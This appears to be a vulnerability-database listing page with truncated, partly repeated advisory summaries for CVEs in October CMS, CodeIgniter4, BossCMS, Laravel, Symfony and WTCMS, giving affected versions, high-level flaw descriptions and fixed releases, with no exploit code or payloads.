CVE-2021-32649

CVE-2021-32649 affects October CMS (Laravel-based). Before versions 1.0.473 and 1.1.6 , an attacker with backend privileges to create, modify and delete website pages can trigger PHP code execution by embedding specially crafted Twig code in the template markup. The issue is remedied in Build 473...

CVE-2021-32649 Authenticated file write leads to remote code execution in october/system

October CMS is a self-hosted content management system CMS platform based on the Laravel PHP Framework. Prior to versions 1.0.473 and 1.1.6, an attacker with "create, modify and delete website pages" privileges in the backend is able to execute PHP code by running specially crafted Twig code in t...

CVE-2021-32650 Arbitrary code execution in october/system

October CMS is a self-hosted content management system CMS platform based on the Laravel PHP Framework. Prior to versions 1.0.473 and 1.1.6, an attacker with access to the backend is able to execute PHP code by using the theme import feature. This will bypass the safe mode feature that prevents P...

CVE-2021-32650 Arbitrary code execution in october/system

October CMS is a self-hosted content management system CMS platform based on the Laravel PHP Framework. Prior to versions 1.0.473 and 1.1.6, an attacker with access to the backend is able to execute PHP code by using the theme import feature. This will bypass the safe mode feature that prevents P...

CVE-2022-21647 Deserialization of Untrusted Data in Codeigniter4

CodeIgniter is an open source PHP full-stack web framework. Deserialization of Untrusted Data was found in the old function in CodeIgniter4. Remote attackers may inject auto-loadable arbitrary objects with this vulnerability, and possibly execute existing PHP code on the server. We are aware of a...

Unauthorized Access Vulnerability in BossCMS

BossCMS is a content management system based on self-developed PHP framework MySQL architecture developed by Wenzhou Huyin Information Technology Co. An unauthorized access vulnerability exists in BossCMS, which can be exploited by attackers to obtain sensitive information...

Arbitrary File Upload Vulnerability in BossCMS

BossCMS is a content management system based on self-developed PHP framework MySQL architecture developed by Wenzhou Huyin Information Technology Co. BossCMS has an arbitrary file upload vulnerability that can be exploited by attackers to gain control of the server...

Laravel Framework 操作系统命令注入漏洞

Laravel Framework is a PHP-based web application development framework by Taylor Otwell, an individual developer. A security vulnerability exists in Laravel Framework prior to version 5.8.17, which is caused by a command injection vulnerability in the software due to a lack of filtering and...

Fedora: Security Advisory for php-symfony4 (FEDORA-2021-0294e8ca24)

The remote host is missing an update for the Copyright C 2021 Greenbone Networks GmbH Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-or-later This program is free software; you can...

[SECURITY] Fedora 34 Update: php-symfony4-4.4.35-1.fc34

Symfony PHP framework version 4. NOTE: Does not require PHPUnit bridge...

CVE-2021-41270

Symfony/Serializer handles serializing and deserializing data structures for Symfony, a PHP framework for web and console applications and a set of reusable PHP components. Symfony versions 4.1.0 before 4.4.35 and versions 5.0.0 before 5.3.12 are vulnerable to CSV injection, also known as formula...

CVE-2021-41270

Symfony/Serializer handles serializing and deserializing data structures for Symfony, a PHP framework for web and console applications and a set of reusable PHP components. Symfony versions 4.1.0 before 4.4.35 and versions 5.0.0 before 5.3.12 are vulnerable to CSV injection, also known as formula...

Design/Logic Flaw

Symfony/Serializer handles serializing and deserializing data structures for Symfony, a PHP framework for web and console applications and a set of reusable PHP components. Symfony versions 4.1.0 before 4.4.35 and versions 5.0.0 before 5.3.12 are vulnerable to CSV injection, also known as formula...

CVE-2021-41270

CVE-2021-41270 (Symfony CSV Injection) affects Symfony/Serializer in Symfony PHP framework. The issue arises in the CsvEncoder where cells beginning with =, +, -, or @ could be treated as formulas. Initially, a tab prefix was used to escape these, but OWASP expanded the vulnerable set to include ...

CVE-2021-41126

October is a Content Management System CMS and web platform built on the the Laravel PHP Framework. In affected versions administrator accounts which had previously been deleted may still be able to sign in to the backend using October CMS v2.0. The issue has been patched in v2.1.12 of the...

CVE-2021-41126 Deleted Admin Can Sign In to Admin Interface

October is a Content Management System CMS and web platform built on the the Laravel PHP Framework. In affected versions administrator accounts which had previously been deleted may still be able to sign in to the backend using October CMS v2.0. The issue has been patched in v2.1.12 of the...

CVE-2021-41126

CVE-2021-41126 affects October CMS (built on Laravel). The issue allows an administrator account that was previously deleted to still sign in to the backend when using October CMS v2.0. This vulnerability is addressed by upgrading the october/october package to v2.1.12. The available connected so...

WTCMS 跨站请求伪造漏洞

WTCMS is a content management system CMS based on ThinkPHP. index.php?g=admin in WTCMS...

WTCMS 跨站脚本漏洞

WTCMS is a content management system CMS based on ThinkPHP.A cross-site scripting vulnerability exists in the link fields under the menu management module of the WTCMS backend. No detailed vulnerability details are provided at this time...

CVE-2021-29487

octobercms in a CMS platform based on the Laravel PHP Framework. In affected versions of the october/system package an attacker can exploit this vulnerability to bypass authentication and takeover of and user account on an October CMS server. The vulnerability is exploitable by unauthenticated...